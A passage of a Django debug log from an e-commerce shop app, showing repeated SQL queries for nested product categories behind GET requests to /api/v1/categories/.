"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:15:47,433 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:15:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:18:21,041 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:18:21,048 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:18:21,053 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:18:21,055 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:18:21,059 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:18:21,061 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:18:21,064 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:18:21,067 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:18:21,069 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:18:21,072 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:18:21,075 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:18:21,077 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:18:21,080 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:18:21,082 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:18:21,086 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:18:21,088 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:18:21,090 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:18:21,093 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:18:21,095 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:18:21,099 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:18:21,101 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:18:21,104 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:18:21,107 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:18:21,110 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:18:21,113 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:18:21,116 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:18:21,119 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:18:21,121 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:18:21,125 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:18:21,129 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:18:21,134 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:18:21,137 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:18:21,140 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:18:21,142 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:18:21,145 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:18:21,149 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:18:21,151 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:18:21,154 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:18:21,157 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:18:21,160 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:18:21,162 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:18:21,165 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:18:21,168 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:18:21,170 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:18:21,173 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:18:21,176 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:18:21] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:18:22,924 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:18:22,933 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:18:22,937 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:18:22,940 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:18:22,944 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:18:22,947 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:18:22,950 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:18:22,954 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:18:22,957 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:18:22,962 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:18:22,965 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:18:22,968 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:18:22,972 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:18:22,975 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:18:22,980 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:18:22,983 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:18:22,985 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:18:22,988 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:18:22,991 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:18:22,996 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY 